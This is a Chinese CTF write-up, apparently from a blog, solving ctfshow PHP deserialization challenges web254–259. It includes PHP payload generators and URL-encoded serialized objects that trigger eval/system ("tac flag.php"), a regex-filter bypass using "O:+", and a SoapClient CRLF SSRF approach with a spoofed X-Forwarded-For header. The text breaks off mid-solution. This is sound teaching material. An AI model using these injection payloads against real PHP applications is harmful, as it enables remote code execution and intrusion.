__construct()\n\u7c7b\u7684\u6784\u9020\u51fd\u6570\n__destruct()\n\u7c7b\u7684\u6790\u6784\u51fd\u6570\n__call()\n\u5728\u5bf9\u8c61\u4e2d\u8c03\u2f64\u2f00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u2f45\u6cd5\u65f6\u8c03\u2f64\n__callStatic()\n\u2f64\u9759\u6001\u2f45\u5f0f\u4e2d\u8c03\u2f64\u2f00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u2f45\u6cd5\u65f6\u8c03\u2f64\n__get()\n\u83b7\u5f97\u2f00\u4e2a\u7c7b\u7684\u6210\u5458\u53d8\u91cf\u65f6\u8c03\u2f64\n__set()\n\u8bbe\u7f6e\u2f00\u4e2a\u7c7b\u7684\u6210\u5458\u53d8\u91cf\u65f6\u8c03\u2f64\n__isset()\n\u5f53\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u2f64isset()\u6216empty()\u65f6\u8c03\u2f64\n__unset()\n\u5f53\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u2f64\nunset()\n\u65f6\u88ab\u8c03\u2f64\u3002\n__sleep()\n\uff0c\u6267\u2f8fserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u2f64\u8fd9\u4e2a\u51fd\u6570\n__wakeup()\n\u6267\u2f8funserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u2f64\u8fd9\u4e2a\u51fd\u6570\n__toString()\n\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u65f6\u7684\u56de\u5e94\u2f45\u6cd5\n__invoke()\n\u8c03\u2f64\u51fd\u6570\u7684\u2f45\u5f0f\u8c03\u2f64\u2f00\u4e2a\u5bf9\u8c61\u65f6\u7684\u56de\u5e94\u2f45\u6cd5\n__set_state()\n\u8c03\u2f64\nvar_export()\n\u5bfc\u51fa\u7c7b\u65f6\uff0c\u6b64\u9759\u6001\u2f45\u6cd5\u4f1a\u88ab\u8c03\u2f64\u3002\n__clone()\n\u5f53\u5bf9\u8c61\u590d\u5236\u5b8c\u6210\u65f6\u8c03\u2f64\n__autoload()\n\u5c1d\u8bd5\u52a0\u8f7d\u672a\u5b9a\u4e49\u7684\u7c7b\n__debugInfo()\n\u6253\u5370\u6240\u9700\u8c03\u8bd5\u4fe1\u606f<\/code><\/pre>\n\n\n\n\u8bbf\u95ee\u63a7\u5236\u4fee\u9970\u7b26(public\u3001protected\u3001private)\u4e0d\u540c\u65f6\uff0c\u5e8f\u5217\u5316\u540e\u7684\u7ed3\u679c\u4e5f\u4e0d\u540c<\/p>\n\n\n\n
public \u88ab\u5e8f\u5217\u5316\u7684\u65f6\u5019\u5c5e\u6027\u540d\u4e0d\u4f1a\u66f4\u6539 \nprotected \u88ab\u5e8f\u5217\u5316\u7684\u65f6\u5019\u5c5e\u6027\u540d\u4f1a\u53d8\u6210 %00*%00\u5c5e\u6027\u540d\nprivate \u88ab\u5e8f\u5217\u5316\u7684\u65f6\u5019\u5c5e\u6027\u540d\u4f1a\u53d8\u6210 %00\u7c7b\u540d%00\u5c5e\u6027\u540d<\/code><\/pre>\n\n\n\n1\u3001__get\u3001__set\n\u8fd9\u4e24\u4e2a\u2f45\u6cd5\u662f\u4e3a\u5728\u7c7b\u548c\u4ed6\u4eec\u7684\u2f57\u7c7b\u4e2d\u6ca1\u6709\u58f0\u660e\u7684\u5c5e\u6027\u2f7d\u8bbe\u8ba1\u7684\n__get( $property ) \u5f53\u8c03\u2f64\u2f00\u4e2a\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u65f6\u8bbf\u95ee\u6b64\u2f45\u6cd5\n__set( $property, $value ) \u7ed9\u2f00\u4e2a\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u8d4b\u503c\u65f6\u8c03\u2f64\n\u8fd9\u2fa5\u7684\u6ca1\u6709\u58f0\u660e\u5305\u62ec\u8bbf\u95ee\u63a7\u5236\u4e3aproteced,private\u7684\u5c5e\u6027\uff08\u5373\u6ca1\u6709\u6743\u9650\u8bbf\u95ee\u7684\u5c5e\u6027\uff09\n2\u3001__isset\u3001__unset\n__isset( $property ) \u5f53\u5728\u2f00\u4e2a\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u4e0a\u8c03\u2f64isset()\u51fd\u6570\u65f6\u8c03\u2f64\u6b64\u2f45\u6cd5\n__unset( $property ) \u5f53\u5728\u2f00\u4e2a\u672a\u5b9a\u4e49\u7684\u5c5e\u6027\u4e0a\u8c03\u2f64unset()\u51fd\u6570\u65f6\u8c03\u2f64\u6b64\u2f45\u6cd5\n\u4e0e__get\u2f45\u6cd5\u548c__set\u2f45\u6cd5\u76f8\u540c\uff0c\u8fd9\u2fa5\u7684\u6ca1\u6709\u58f0\u660e\u5305\u62ec\u8bbf\u95ee\u63a7\u5236\u4e3aproteced,private\u7684\u5c5e\u6027\uff08\u5373\u6ca1\u6709\u6743\u9650\u8bbf\u95ee\u7684\u5c5e\u6027\uff09\n3\u3001__call\n__call( $method, $arg_array ) \n\u5f53\u8c03\u2f64\u2f00\u4e2a\u672a\u5b9a\u4e49(\u5305\u62ec\u6ca1\u6709\u6743\u9650\u8bbf\u95ee)\u7684\u2f45\u6cd5\u662f\u8c03\u2f64\u6b64\u2f45\u6cd5\n4\u3001__autoload\n__autoload \u51fd\u6570\uff0c\u4f7f\u2f64\u5c1a\u672a\u88ab\u5b9a\u4e49\u7684\u7c7b\u65f6\u2f83\u52a8\u8c03\u2f64\u3002\u901a\u8fc7\u6b64\u51fd\u6570\uff0c\u811a\u672c\u5f15\u64ce\u5728 PHP \u51fa\u9519\u5931\u8d25\u524d\u6709\u4e86\u6700\u540e\u2f00\u4e2a\u673a\u4f1a\u52a0\u8f7d\u6240\u9700\u7684\u7c7b\u3002\n\n\u6ce8\u610f: \u5728 __autoload \u51fd\u6570\u4e2d\u629b\u51fa\u7684\u5f02\u5e38\u4e0d\u80fd\u88ab catch \u8bed\u53e5\u5757\u6355\u83b7\u5e76\u5bfc\u81f4\u81f4\u547d\u9519\u8bef\u3002\n5\u3001__construct\u3001__destruct\n__construct \u6784\u9020\u2f45\u6cd5\uff0c\u5f53\u2f00\u4e2a\u5bf9\u8c61\u88ab\u521b\u5efa\u65f6\u8c03\u2f64\u6b64\u2f45\u6cd5\uff0c\u597d\u5904\u662f\u53ef\u4ee5\u4f7f\u6784\u9020\u2f45\u6cd5\u6709\u2f00\u4e2a\u72ec\u2f00\u2f46\u2f06\u7684\u540d\u79f0\uff0c\u2f46\u8bba\u5b83\u6240\u5728\u7684\u7c7b\u7684\u540d\u79f0\u662f\u4ec0\u4e48\uff0c\u8fd9\u6837\u4f60\u5728\u6539\u53d8\u7c7b\u7684\u540d\u79f0\u65f6\uff0c\u5c31\u4e0d\u9700\u8981\u6539\u53d8\u6784\u9020\u2f45\u6cd5\u7684\u540d\u79f0__destruct \u6790\u6784\u2f45\u6cd5\uff0cPHP\u5c06\u5728\u5bf9\u8c61\u88ab\u9500\u6bc1\u524d\uff08\u5373\u4ece\u5185\u5b58\u4e2d\u6e05\u9664\u524d\uff09\u8c03\u2f64\u8fd9\u4e2a\u2f45\u6cd5\u9ed8\u8ba4\u60c5\u51b5\u4e0b,PHP\u4ec5\u4ec5\u91ca\u653e\u5bf9\u8c61\u5c5e\u6027\u6240\u5360\u2f64\u7684\u5185\u5b58\u5e76\u9500\u6bc1\u5bf9\u8c61\u76f8\u5173\u7684\u8d44\u6e90\uff0c\u6790\u6784\u51fd\u6570\u5141\u8bb8\u4f60\u5728\u4f7f\u2f64\u2f00\u4e2a\u5bf9\u8c61\u4e4b\u540e\u6267\u2f8f\u4efb\u610f\u4ee3\u7801\u6765\u6e05\u9664\u5185\u5b58\uff0c\u5f53PHP\u51b3\u5b9a\u4f60\u7684\u811a\u672c\u4e0d\u518d\u4e0e\u5bf9\u8c61\u76f8\u5173\u65f6\uff0c\u6790\u6784\u51fd\u6570\u5c06\u88ab\u8c03\u2f64\uff0c\u5728\u2f00\u4e2a\u51fd\u6570\u7684\u547d\u540d\u7a7a\u95f4\u5185\uff0c\u8fd9\u4f1a\u53d1\u2f63\u5728\u51fd\u6570return\u7684\u65f6\u5019\uff0c\u5bf9\u4e8e\u5168\u5c40\u53d8\u91cf\uff0c\u8fd9\u53d1\u2f63\u4e8e\u811a\u672c\u7ed3\u675f\u7684\u65f6\u5019\uff0c\u5982\u679c\u4f60\u60f3\u660e\u786e\u5730\u9500\u6bc1\u2f00\u4e2a\u8c61\uff0c\u4f60\u53ef\u4ee5\u7ed9\u6307\u5411\u8be5\u5bf9\u8c61\u7684\u53d8\u91cf\u5206\u914d\u4efb\u4f55\u5176\u5b83\u503c\uff0c\u901a\u5e38\u5c06\u53d8\u91cf\u8d4b\u503c\u52e4\u4e3aNULL\u6216\u8005\u8c03\u2f64unset\u3002\n6\u3001__clone\nPHP5\u4e2d\u7684\u5bf9\u8c61\u8d4b\u503c\u662f\u4f7f\u2f64\u7684\u5f15\u2f64\u8d4b\u503c\uff0c\u4f7f\u2f64clone\u2f45\u6cd5\u590d\u5236\u2f00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u5bf9\u8c61\u4f1a\u2f83\u52a8\u8c03\u2f64__clone\u9b54\u672f\u2f45\u6cd5\uff0c\u5982\u679c\u5728\u5bf9\u8c61\u590d\u5236\u9700\u8981\u6267\u2f8f\u67d0\u4e9b\u521d\u59cb\u5316\u64cd\u4f5c\uff0c\u53ef\u4ee5\u5728__clone\u2f45\u6cd5\u5b9e\u73b0\u3002\n7\u3001__toString \n__toString\n\u2f45\u6cd5\u5728\u5c06\u2f00\u4e2a\u5bf9\u8c61\u8f6c\u5316\u6210\u5b57\u7b26\u4e32\u65f6\u2f83\u52a8\u8c03\u2f64\uff0c\u2f50\u5982\u4f7f\u2f64echo\u6253\u5370\u5bf9\u8c61\u65f6\uff0c\u5982\u679c\u7c7b\u6ca1\u6709\u5b9e\u73b0\u6b64\u2f45\u6cd5\uff0c\u5219\u2f46\u6cd5\u901a\u8fc7echo\u6253\u5370\u5bf9\u8c61\uff0c\u5426\u5219\u4f1a\u663e\u793a\uff1aCatchable fatal error: Object of class test could not be converted to string in\uff0c\u6b64\u2f45\u6cd5\u5fc5\u987b\u8fd4\u56de\u2f00\u4e2a\u5b57\u7b26\u4e32\u3002\u5728\nPHP 5.2.0\u4e4b\u524d\uff0c__toString\u2f45\u6cd5\u53ea\u6709\u7ed3\u5408\u4f7f\u2f64echo() \u6216print()\u65f6 \u624d\u80fd\u2f63\u6548\u3002PHP 5.2.0\u4e4b\u540e\uff0c\u5219\u53ef\u4ee5\u5728\u4efb\u4f55\u5b57\u7b26\u4e32\u73af\u5883\u2f63\u6548\uff08\u4f8b\u5982\u901a\u8fc7printf()\uff0c\u4f7f\u2f64%s\u4fee\u9970\u7b26\uff09\uff0c\u4f46 \u4e0d\u80fd\u2f64\u4e8e\u2fae\u5b57\u7b26\u4e32\u73af\u5883\uff08\u5982\u4f7f\u2f64%d\u4fee\u9970\u7b26\uff09\u3002\u4ecePHP 5.2.0\uff0c\u5982\u679c\u5c06\u2f00\u4e2a\u672a\u5b9a\u4e49__toString\n\u2f45\u6cd5\u7684\u5bf9\u8c61 \u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\uff0c\u4f1a\u62a5\u51fa\u2f00\u4e2aE_RECOVERABLE_ERROR\n\u9519\u8bef\u3002\n8\u3001__sleep\u3001__wakeup\n__sleep \u4e32\u2f8f\u5316\u7684\u65f6\u5019\u2f64\n__wakeup \u53cd\u4e32\u2f8f\u5316\u7684\u65f6\u5019\u8c03\u2f64\nserialize() \u68c0\u67e5\u7c7b\u4e2d\u662f\u5426\u6709\u9b54\u672f\u540d\u79f0 __sleep \u7684\u51fd\u6570\u3002\u5982\u679c\u8fd9\u6837\uff0c\u8be5\u51fd\u6570\u5c06\u5728\u4efb\u4f55\u5e8f\u5217\u5316\u4e4b\u524d\u8fd0\u2f8f\u3002\u5b83\u53ef\u4ee5\u6e05\u9664\u5bf9\u8c61\u5e76\u5e94\u8be5\u8fd4\u56de\u2f00\u4e2a\u5305\u542b\u6709\u8be5\u5bf9\u8c61\u4e2d\u5e94\u88ab\u5e8f\u5217\u5316\u7684\u6240\u6709\u53d8\u91cf\u540d\u7684\u6570\u7ec4\u3002\n\u4f7f\u2f64 __sleep \u7684\u2f6c\u7684\u662f\u5173\u95ed\u5bf9\u8c61\u53ef\u80fd\u5177\u6709\u7684\u4efb\u4f55\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u63d0\u4ea4\u7b49\u5f85\u4e2d\u7684\u6570\u636e\u6216\u8fdb\u2f8f\u7c7b\u4f3c\u7684\u6e05\u9664\u4efb\u52a1\u3002\u6b64\u5916\uff0c\u5982\u679c\u6709\u2fae\u5e38\u2f24\u7684\u5bf9\u8c61\u2f7d\u5e76\u4e0d\u9700\u8981\u5b8c\u5168\u50a8\u5b58\u4e0b\u6765\u65f6\u6b64\u51fd\u6570\u4e5f\u5f88\u6709\u2f64\u3002\n\u76f8\u53cd\u5730\uff0cunserialize() \u68c0\u67e5\u5177\u6709\u9b54\u672f\u540d\u79f0__wakeup \u7684\u51fd\u6570\u7684\u5b58\u5728\u3002\u5982\u679c\u5b58\u5728\uff0c\u6b64\u51fd\u6570\u53ef\u4ee5\u91cd\u5efa\u5bf9\u8c61\u53ef\u80fd\u5177\u6709\u7684\u4efb\u4f55\u8d44\u6e90\u3002\u4f7f\u2f64 __wakeup \u7684\u2f6c\u7684\u662f\u91cd\u5efa\u5728\u5e8f\u5217\u5316\u4e2d\u53ef\u80fd\u4e22\u5931\u7684\u4efb\u4f55\u6570\u636e\u5e93\u8fde\u63a5\u4ee5\u53ca\u5904\u7406\u5176\u5b83\u91cd\u65b0\u521d\u59cb\u5316\u7684\u4efb\u52a1\u3002\n9\u3001__set_state\n\u5f53\u8c03\u2f64var_export()\u65f6\uff0c\u8fd9\u4e2a\u9759\u6001 \u2f45\u6cd5\u4f1a\u88ab\u8c03\u2f64\uff08\u2f83PHP 5.1.0\u8d77\u6709\u6548\uff09\u3002\u672c\u2f45\u6cd5\u7684\u552f\u2f00\u53c2\u6570\u662f\u2f00\u4e2a\u6570\u7ec4\uff0c\u5176\u4e2d\u5305\u542barray(\u2019property\u2019 => value, \u2026)\u683c\u5f0f\u6392\u5217\u7684\u7c7b\u5c5e\u6027\u3002\n10\u3001__invoke\n\u5f53\u5c1d\u8bd5\u4ee5\u8c03\u2f64\u51fd\u6570\u7684\u2f45\u5f0f\u8c03\u2f64\u2f00\u4e2a\u5bf9\u8c61\u65f6\uff0c__invoke\u2f45\u6cd5\u4f1a\u88ab\u2f83\u52a8\u8c03\u2f64\u3002PHP5.3.0\u4ee5\u4e0a\u7248\u672c\u6709\u6548\n11\u3001__callStatic\u5b83\u7684\u2f2f\u4f5c\u2f45\u5f0f\u7c7b\u4f3c\u4e8e__call() \n\u9b54\u672f\u2f45\u6cd5\uff0c__callStatic() \u662f\u4e3a\u4e86\u5904\u7406\u9759\u6001\u2f45\u6cd5\u8c03\u2f64\uff0cPHP5.3.0\u4ee5\u4e0a\u7248\u672c\u6709\u6548\uff0cPHP \u786e\u5b9e\u52a0\u5f3a\u4e86\u5bf9 __callStatic() \u2f45\u6cd5\u7684\u5b9a\u4e49\uff1b\u5b83\u5fc5\u987b\u662f\u516c\u5171\u7684\uff0c\u5e76\u4e14\u5fc5\u987b\u88ab\u58f0\u660e\u4e3a\u9759\u6001\u7684\u3002\u540c\u6837\uff0c__call() \n\u9b54\u672f\u2f45\u6cd5\u5fc5\u987b\u88ab\u5b9a\u4e49\u4e3a\u516c\u5171\u7684\uff0c\u6240\u6709\u5176\u4ed6\u9b54\u672f\u2f45\u6cd5\u90fd\u5fc5\u987b\u5982\u6b64\u3002<\/code><\/pre>\n\n\n\nweb254<\/h2>\n\n\n\n<?php\n\/*\n# -*- coding: utf-8 -*\n# @Author: h1xa\n# @Date: 2020-12-02 17:44:47\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-12-02 19:29:02\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude('flag.php');\nclass ctfShowUser{\npublic $username='xxxxxx';\npublic $password='xxxxxx';\npublic $isVip=false;\npublic function checkVip(){\nreturn $this->isVip;\n}\npublic function login($u,$p){\nif($this->username===$u&&$this->password===$p){\n$this->isVip=true;\n}\nreturn $this->isVip;\n}\npublic function vipOneKeyGetFlag(){\nif($this->isVip){\nglobal $flag;\necho \"your flag is \".$flag;\n}else{\necho \"no vip, no flag\";\n}\n}\n}\n$username=$_GET['username'];\n$password=$_GET['password'];\nif(isset($username) && isset($password)){\n$user = new ctfShowUser();\nif($user->login($username,$password)){\nif($user->checkVip()){\n$user->vipOneKeyGetFlag();\n}\n}else{\necho \"no vip,no flag\";\n}\n}<\/code><\/pre>\n\n\n\n\u548c\u53cd\u5e8f\u5217\u5316\u6ca1\u6709\u4ec0\u4e48\u5173\u7cfb\uff0c\u76f4\u63a5\u4f20username=xxxxxx&password=xxxxxx\u5373\u53ef \u5982\u679c\u8981\u5206\u6790\uff0c\u8fd9\u2fa5\u5c31\u662f\u5148new\u5b9e\u4f8b\u5316ctfShowUser\u8fd9\u4e2a\u7c7b\uff0c\u5982\u4f55\u628ausername\u548cpassword\u53c2\u4f20\u2f0a\u8c03 \u2f64\u7c7b\u4e2d\u7684login\u2f45\u6cd5\u3002\u5982\u679cusername\u548cpassword\u548c\u7c7b\u4e2d\u7684\u76f8\u7b49\uff0c\u7c7b\u4e2d\u7684isVip\u5c31\u4e3aTrue\uff0c\u4e3aTrue\u8fdb \u2f0acheck\u5c31\u4e3aTrue\uff0c\u4e8e\u662f\u62ff\u5230flag\u3002<\/p>\n\n\n\n
web255<\/h2>\n\n\n\n<?php\n\/*\n# -*- coding: utf-8 -*\n# @Author: h1xa\n# @Date: 2020-12-02 17:44:47\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-12-02 19:29:02\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude('flag.php');\nclass ctfShowUser{\npublic $username='xxxxxx';\npublic $password='xxxxxx';\npublic $isVip=false;\npublic function checkVip(){\nreturn $this->isVip;\n}\npublic function login($u,$p){\nreturn $this->username===$u&&$this->password===$p;\n}\npublic function vipOneKeyGetFlag(){\nif($this->isVip){\nglobal $flag;\necho \"your flag is \".$flag;\n}else{\necho \"no vip, no flag\";\n}\n}\n}\n$username=$_GET['username'];\n$password=$_GET['password'];\nif(isset($username) && isset($password)){\n$user = unserialize($_COOKIE['user']); \nif($user->login($username,$password)){\nif($user->checkVip()){\n $user->vipOneKeyGetFlag();\n}\n}else{\necho \"no vip,no flag\";\n}\n}<\/code><\/pre>\n\n\n\n\uff0c\u8fd9\u2fa5\u5728\u4e4b\u524d\u7684\u57fa\u7840\u4e0a\u591a\u4e86\u4e2a\u53cd\u5e8f\u5217\u5316\uff0c\u662f$user = unserialize($_COOKIE[‘user’]);<\/p>\n\n\n\n
\u2f7d\u4e14login\u4e2d\u5c11\u4e86$this->isVip=true;\u56e0\u6b64\u8981\u60f3\u529e\u6cd5\u628aisVip\u7ed9\u5f04\u6210true\u5c31\u662f\u54b1\u7684\u2f6c\u7684<\/p>\n\n\n\n
\u7136\u540e\u53ef\u4ee5\u53d1\u73b0$user\u662f\u6211\u4eec\u2f83\u2f30\u901a\u8fc7COOKIE[‘user’]\u6765\u4f20\uff0c\u610f\u601d\u662f\u4f1a\u5bf9\u8fd9\u4e2auser\u8fdb\u2f8f\u53cd\u5e8f\u5217\u5316\u3002\u8fd9 \u662f\u2f00\u4e2a\u6f0f\u6d1e\u70b9\uff0c\u5373\u901a\u8fc7\u8fd9\u4e2a\u4f20\u2f00\u4e2a\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e32\uff0c\u901a\u8fc7\u53cd\u5e8f\u5217\u5316\u6765\u8fbe\u5230isVip=True<\/p>\n\n\n\n
\u8fd9\u2fa5\u65b0\u5efa\u2f00\u4e2aphp\u2f42\u4ef6\uff0c\u6765\u8fdb\u2f8f\u5e8f\u5217\u5316<\/p>\n\n\n\n
<?php\nclass ctfShowUser\n{\npublic $username = 'xxxxxx';\npublic $password = 'xxxxxx';\npublic $isVip = true;\n}\n$a = new ctfShowUser();\necho serialize($a);\n?><\/code><\/pre>\n\n\n\nO:11:\"ctfShowUser\":3:{s:8:\"username\";s:6:\"xxxxxx\";s:8:\"password\";s:6:\"xxxxx\nx\";s:5:\"isVip\";b:1;}<\/code><\/pre>\n\n\n\n![\"image-20260104223844832\"](\"https:\/\/bucketqiao123456.oss-cn-beijing.aliyuncs.com\/image-20260104223844832.png\")
<\/figure>\n\n\n\nweb256<\/h2>\n\n\n\n<?php\n\/*\n# -*- coding: utf-8 -*\n# @Author: h1xa\n# @Date: 2020-12-02 17:44:47\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-12-02 19:29:02\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude('flag.php');\nclass ctfShowUser{\npublic $username='xxxxxx';\npublic $password='xxxxxx';\npublic $isVip=false;\npublic function checkVip(){\nreturn $this->isVip;\n}\npublic function login($u,$p){\nreturn $this->username===$u&&$this->password===$p;\n}\npublic function vipOneKeyGetFlag(){\nif($this->isVip){\nglobal $flag;\nif($this->username!==$this->password){\necho \"your flag is \".$flag;\n}\n}else{\necho \"no vip, no flag\";\n}\n}\n}\n$username=$_GET['username'];\n$password=$_GET['password'];\nif(isset($username) && isset($password)){\n$user = unserialize($_COOKIE['user']); \n if($user->login($username,$password)){\nif($user->checkVip()){\n$user->vipOneKeyGetFlag();\n}\n}else{\necho \"no vip,no flag\";\n}\n}<\/code><\/pre>\n\n\n\n\u5728\u6b64\u524d\u7684\u57fa\u7840\u4e0a\uff0c\u53ea\u662f\u591a\u52a0\u4e86\u2f00\u4e2ausername!==password \u90a3\u4e48\u53ea\u9700\u8981\u5728\u53cd\u5e8f\u5217\u5316\u7684\u65f6\u5019\u6539\u2f00\u4e0b\u5c31\u2f8f<\/p>\n\n\n\n
<?php\nclass ctfShowUser\n{\npublic $username = 'mumuzi';\npublic $password = '0.38';\npublic $isVip = true;\n}\n$a = new ctfShowUser();\necho serialize($a);\n?><\/code><\/pre>\n\n\n\n![\"image-20260104224003574\"](\"https:\/\/bucketqiao123456.oss-cn-beijing.aliyuncs.com\/image-20260104224003574.png\")
<\/figure>\n\n\n\n\u7136\u540e\u6ce8\u610f\u4f20\u53c2\u7684username\u548cpassword\u8bb0\u5f97\u6539<\/p>\n\n\n\n
web 257<\/h2>\n\n\n\n<?php\n\/*\n# -*- coding: utf-8 -*\n# @Author: h1xa\n# @Date: 2020-12-02 17:44:47\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-12-02 20:33:07\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\nerror_reporting(0);\nhighlight_file(__FILE__);\nclass ctfShowUser{\nprivate $username='xxxxxx';\nprivate $password='xxxxxx';\nprivate $isVip=false;\nprivate $class = 'info';\npublic function __construct(){\n$this->class=new info();\n}\npublic function login($u,$p){\nreturn $this->username===$u&&$this->password===$p;\n}\npublic function __destruct(){\n$this->class->getInfo();\n}\n}\nclass info{\nprivate $user='xxxxxx';\npublic function getInfo(){\nreturn $this->user;\n}\n}\nclass backDoor{\nprivate $code;\npublic function getInfo(){\neval($this->code);\n }\n}\n$username=$_GET['username'];\n$password=$_GET['password'];\nif(isset($username) && isset($password)){\n$user = unserialize($_COOKIE['user']);\n$user->login($username,$password);\n}<\/code><\/pre>\n\n\n\n\u2fb8\u5148\u53cd\u5e8f\u5217\u5316\u7684\u65f6\u5019\u4f1a\u5b9e\u4f8b\u5316info\u7c7b<\/p>\n\n\n\n
public function __construct(){\n$this->class=new info();\n}<\/code><\/pre>\n\n\n\n\u5176\u6b21\u5728\u6467\u6bc1\u7684\u65f6\u5019\u4f1a\u8c03\u2f64getInfo\u2f45\u6cd5<\/p>\n\n\n\n
public function __destruct(){\n$this->class->getInfo();\n}<\/code><\/pre>\n\n\n\n\u8fd9\u2fa5getInfo\u2f45\u6cd5\u662f\u5728info\u7c7b\u5f53\u4e2d\u7684<\/p>\n\n\n\n
\u2f7d\u6211\u4eec\u8981\u505a\u5230\u7684\u662f\u8c03\u2f64backDoor\u4e2d\u7684getInfo\u7c7b\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u7c7b\u6709eval\u53ef\u4ee5\u8ba9\u6211\u4eec\u547d\u4ee4\u6267\u2f8f \u56e0\u6b64\u5728\u811a\u672c\u4e2d\uff0c\u5c06<\/p>\n\n\n\n
private $class = 'info';\npublic function __construct(){\n$this->class=new info();\n}<\/code><\/pre>\n\n\n\n\u6539\u6210<\/p>\n\n\n\n
private $class = 'backDoor';\npublic function __construct(){\n$this->class=new backDoor();\n}<\/code><\/pre>\n\n\n\n\u518d\u53bb\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n
O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3\nBO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A2\n3%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D<\/code><\/pre>\n\n\n\nweb 258<\/h2>\n\n\n\n<?php\n\/*\n# -*- coding: utf-8 -*\n# @Author: h1xa\n# @Date: 2020-12-02 17:44:47\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-12-02 21:38:56\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\nerror_reporting(0);\nhighlight_file(__FILE__);\nclass ctfShowUser{\npublic $username='xxxxxx';\npublic $password='xxxxxx';\npublic $isVip=false;\npublic $class = 'info';\npublic function __construct(){\n$this->class=new info();\n}\npublic function login($u,$p){\nreturn $this->username===$u&&$this->password===$p;\n}\npublic function __destruct(){\n$this->class->getInfo();\n}\n}\nclass info{\npublic $user='xxxxxx';\npublic function getInfo(){\nreturn $this->user;\n}\n}\nclass backDoor{\npublic $code;\npublic function getInfo(){\neval($this->code);\n }\n}\n$username=$_GET['username'];\n$password=$_GET['password'];\nif(isset($username) && isset($password)){\nif(!preg_match('\/[oc]:d+:\/i', $_COOKIE['user'])){\n$user = unserialize($_COOKIE['user']);\n}\n$user->login($username,$password);\n}<\/code><\/pre>\n\n\n\n\u53ea\u662f\u5728\u521a\u521a\u7684\u57fa\u7840\u4e0a\u8fc7\u6ee4\u4e86\u2f00\u4e0b<\/p>\n\n\n\n
\u4f7f\u2f64O:+\u4ee3\u66ffO<\/p>\n\n\n\n
\u8fd8\u6709\u4e2a\u6539\u52a8\u662fprivate $code\u53d8\u6210\u4e86public $code\u3001\u8fd8\u6709public $class<\/p>\n\n\n\n
<?php\nclass ctfShowUser\n{\npublic $class = 'backDoor';\npublic function __construct(){\n$this->class=new backDoor();\n}\n}\nclass backDoor{\npublic $code = 'system(\"tac flag.php\");';\n}\n$a = new ctfShowUser();\n$a = serialize($a);\n$a = str_replace(\"O:\",\"O:+\",$a);\necho urlencode($a);\n?><\/code><\/pre>\n\n\n\nO%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22\nbackDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22tac+flag.\nphp%22%29%3B%22%3B%7D%7D<\/code><\/pre>\n\n\n\nweb259<\/h2>\n\n\n\n<?php\nhighlight_file(__FILE__);\n$vip = unserialize($_GET['vip']);\n\/\/vip can get flag one key\n$vip->getFlag();\nNotice: Undefined index: vip in \/var\/www\/html\/index.php on line 6\nFatal error: Uncaught Error: Call to a member function getFlag() on bool i\nn \/var\/www\/html\/index.php:8 Stack trace: #0 {main} thrown in \/var\/www\/htm\nl\/index.php on line 8<\/code><\/pre>\n\n\n\n#flag.php\n<?php\n$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);\narray_pop($xff);\n$ip = array_pop($xff);\nif($ip!=='127.0.0.1'){\ndie('error');\n}else{\n$token = $_POST['token'];\nif($token=='ctfshow'){\nfile_put_contents('flag.txt',$flag);\n}\n}\n?><\/code><\/pre>\n\n\n\n\u53c2\u8003\uff1ahttps:\/\/zhuanlan.zhihu.com\/p\/80918004<\/p>\n\n\n\n
\u4f7f\u2f64SoapClient\u53cd\u5e8f\u5217\u5316+CRLF\u53ef\u4ee5\u2f63\u6210\u4efb\u610fPOST\u8bf7\u6c42<\/p>\n\n\n\n
Deserialization + __call + SoapClient + CRLF = SSRF<\/p>\n\n\n\n
ssrf\u53bb\u8bbf\u95eeflag.php,POST\u4f20token==ctfshow\uff0cxff 127.0.0.1<\/p>\n\n\n\n
\u6ce8\u610fxff\u90e8\u5206\uff0c\u5c06X-Forwarded-For\u6309\u7167 ,<\/strong> \u5206\u4e3a\u6570\u7ec4\uff0c\u63a5\u7740pop\u7b2c\u2f00\u4e2a\u5143\u7d20\uff0c\u2f64\u7684\u662f\u7b2c\u2f06\u4e2a\u5143\u7d20\u6765\u4f5c\u4e3aip<\/p>\n\n\n\n$ua=\"ctfshownX-Forwarded-For:127.0.0.1,127.0.0.1\"<\/code><\/pre>\n\n\n\n\u7136\u540e\u6784\u9020post<\/p>\n\n\n\n
